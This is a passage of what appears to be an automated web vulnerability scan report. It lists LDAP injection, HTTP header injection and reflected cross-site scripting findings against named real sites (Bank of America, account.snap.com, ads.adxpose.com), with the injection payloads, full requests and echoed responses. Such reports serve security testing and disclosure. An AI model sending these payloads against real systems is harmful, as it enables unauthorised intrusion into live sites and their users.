Set-cookie: JSESSIONID=00005In7HcqpnQV0X22RgYk-TSU:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=9513; Expires=Sun, 23 Oct 2011 12:44:31 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="te
...[SNIP]...

2.9. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BIGipServerngen-www.80 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the BIGipServerngen-www.80 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=*)(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:13 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=429; Expires=Sun, 23 Oct 2011 12:27:12 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:27:12 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascri
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=*)!(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:13 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=938083; Expires=Sun, 23 Oct 2011 12:27:12 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

3. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 69ddc%0d%0a94739ce3cc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15&69ddc%0d%0a94739ce3cc=1 HTTP/1.1
Host: 109.xg4ken.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=53c1fc86-0f12-0ce9-ea0e-00005cbf77a5; expires=Sun, 24-Jul-2011 23:44:08 GMT; path=/; domain=.xg4ken.com
Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15&69ddc
94739ce3cc
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


4. Cross-site scripting (reflected)  previous  next
There are 70 instances of this issue:


4.1. https://account.snap.com/signup.php [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574ea"><script>alert(1)</script>46987829a31 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 15403

terms=Snap+Shots+Terms+of+Use+Policy%0D%0A%0D%0APLEASE+READ+VERY+CAREFULLY+THESE+TERMS+OF+USE+FOR+THE+SNAP+SHOTS+PROGRAM%2C+INCLUDING+THE+SNAP+SHARES+FEATURES%2C+BEFORE+REGISTERING.+PARTICIPATION+IN+T
...[SNIP]...
Agreement+is+intended+to+be+a+beneficiary+of+this+Agreement%2C+and+no+person+not+a+party+to+this+Agreement+shall+have+any+right+to+enforce+any+term+of+this+Agreement.%0D%0A%0D%0A&accept_terms=1&email=574ea"><script>alert(1)</script>46987829a31&url=&password=&re-enter_password=&current_tab=setup

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:05:23 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<input class="text" type="text" name="email" maxlength="50" value="574ea"><script>alert(1)</script>46987829a31" />
...[SNIP]...

4.2. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ae7"%3balert(1)//631b5ca9cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4ae7";alert(1)//631b5ca9cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php/f4ae7"%3balert(1)//631b5ca9cf4 HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:07:47 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<script type="text/javascript">
_udn = document.domain;
_uacct = "UA-2209883-1";
if (typeof currentTab == "string") {
urchinTracker("/signup.php/f4ae7";alert(1)//631b5ca9cf4#" + currentTab);
} else {
urchinTracker();
}
</script>
...[SNIP]...

4.3. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b702f"><script>alert(1)</script>9caf33b1143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php/b702f"><script>alert(1)</script>9caf33b1143 HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:07:45 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<form id="customize_form" name="customize_form" action="/signup.php/b702f"><script>alert(1)</script>9caf33b1143" enctype="multipart/form-data" method="post">
...[SNIP]...

4.4. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e6c"><script>alert(1)</script>b24b8c87a04849e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php/b2e6c"><script>alert(1)</script>b24b8c87a04849e58?key=81a33c00e5b2572629a04571cb191964&shots_lang=en-us&shots_link_icon=1&shots_preview_ext=1&shots_theme=silver&shots_custom_logo=0&current_tab=customize HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:09:12 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<form id="customize_form" name="customize_form" action="/signup.php/b2e6c"><script>alert(1)</script>b24b8c87a04849e58" enctype="multipart/form-data" method="post">
...[SNIP]...

4.5. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bfc"%3balert(1)//0b224300d3fd4d46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81bfc";alert(1)//0b224300d3fd4d46a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php/81bfc"%3balert(1)//0b224300d3fd4d46a?key=81a33c00e5b2572629a04571cb191964&shots_lang=en-us&shots_link_icon=1&shots_preview_ext=1&shots_theme=silver&shots_custom_logo=0&current_tab=customize HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:09:14 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<script type="text/javascript">
_udn = document.domain;
_uacct = "UA-2209883-1";
if (typeof currentTab == "string") {
urchinTracker("/signup.php/81bfc";alert(1)//0b224300d3fd4d46a#" + currentTab);
} else {
urchinTracker();
}
</script>
...[SNIP]...

4.6. https://account.snap.com/signup.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ae50"><script>alert(1)</script>0b72ea1f0e8 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 15403

terms=Snap+Shots+Terms+of+Use+Policy%0D%0A%0D%0APLEASE+READ+VERY+CAREFULLY+THESE+TERMS+OF+USE+FOR+THE+SNAP+SHOTS+PROGRAM%2C+INCLUDING+THE+SNAP+SHARES+FEATURES%2C+BEFORE+REGISTERING.+PARTICIPATION+IN+T
...[SNIP]...
ment+is+intended+to+be+a+beneficiary+of+this+Agreement%2C+and+no+person+not+a+party+to+this+Agreement+shall+have+any+right+to+enforce+any+term+of+this+Agreement.%0D%0A%0D%0A&accept_terms=1&email=&url=6ae50"><script>alert(1)</script>0b72ea1f0e8&password=&re-enter_password=&current_tab=setup

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:05:44 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<input class="text" type="text" name="url" maxlength="255" value="6ae50"><script>alert(1)</script>0b72ea1f0e8" />
...[SNIP]...

4.7. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload c52ae<script>alert(1)</script>e41adc6af97 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289667c52ae<script>alert(1)</script>e41adc6af97 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=527F87460647F92F1D5DF43DA9C49229; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
